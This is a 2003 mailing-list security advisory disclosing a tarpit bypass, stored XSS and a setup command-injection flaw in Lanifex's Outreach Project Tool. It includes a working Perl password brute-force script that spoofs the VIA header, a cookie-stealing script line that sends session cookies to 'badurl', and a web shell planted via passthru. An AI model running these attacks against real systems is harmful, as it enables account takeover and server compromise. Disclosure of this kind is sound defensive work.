Outreach Project Tool

From: Martin Eiszner (martinat_private)
Date: Thu Jan 16 2003 - 07:52:15 PST

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    to the list,
    2003/01/16 @meiat_private
    Outreach Project Tool
    Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)
    Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
    Licensse: GPL
    VendorStatus: Informed on Oct 2002
    VendorStatus: ---
    VendorPatch: ---
    Local: NO
    Remote: YES
    1) Tarpit out-cheat (brute-force attack)
    2) Cross-Site-Scripting
    3) Setup
    Tested Plattforms: Linux / Slackware 8.0 i686 / Apache 1.3.*
    Severety: MEDIUM
    The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementat
    ion. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consult
    ants and their clients, as well as a wide range of other applications.
    Vulnerability Details
    1) Request Header allows Tarpit - out-cheat
    2) Multiple XSS-problems in community/forums
    3) Setup (/opt/setup) permission issues
    B) Description of Vulnerabilities
    The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR" and "VIA"-
    environment variables.
    This is done to identify possible proxy-servers.
    Unfortunately these variables are part of the HTTP-request headers.
    the follwoing http-request:
    GET /opt/whatever HTTP/1.1
    Host: whatever
    "$HTTP_VIA" will be used as the users IP.
    Thus leading to:
    -Anonymous use of the application
    -Possibility of a brute-force attack against accounts
    Simple example for a brute-force attack against OPT:
    ---cut here---
    use LWP::UserAgent;
    use HTTP::Request::Common;
    use HTTP::Response;
    my ($url,$uid,$pf) = @ARGV;
    open(P,"< $pf") || die "passf.?\n";
    my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
    while(<P>){ my $pwd = $_; chomp($pwd);
    my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
    my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
    my $hds = $res->headers; my $new = $hds->header("Location");
    my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
    my $cod = $res2->code;
    my $pag = $res2->content;
    print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
    close (P);
    ---cut here---
    2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
    Typical XSS vulnerabilities exist in manny/most of the community-functions.
    Once logged in ... goto "Notes -> News -> Ad News"
    Then create a News with scripting tags included:
    ---cut here---
    hello i am a news thing .. bla bla ...
    <script> alert(document.cookie); </script>
    ---cut here---
    Now every user gets now an alert window with his own session-id.(only as example!!)
    Of course it is possible to steal the OPT_Session by requesting
    another url where a so called cookie-theft is installed !!
    (location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
    This vulnerability makes it possible once logged in to steal "any" other users
    accounts (administrator included !).
    3) SETUP-ISSUES (/opt/setup)
    If the lockfile "lock01" in the setup_lock-directory is not removed due to
    wrong permission settings or someone is able/allowed to create a file "lock01"
    it is possible to:
    a) Create a new Setup
    b) Execute system-commands thru the setup.php - script.
    This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function.
    Example GET-Request:
    ---cut here---
    &action=Set up my OPT server
    ---cut here---
    Above will create a script called "bad.php" with content(<?passthru($c)?>)in the
    OPT-setup directory !
    Recommended Hotfixes
    After installation check if file "lock01" exists in setup_lock-directory.
    if yes, remove it.
    The other vulnerabilities can only be fixed by sw-patches.
    EOF Martin Eiszner / @2002WebSec.org
    WebSec.org / Martin Eiszner
    Gurkgasse 49/Top14
    1140 Vienna
    Austria / EUROPE

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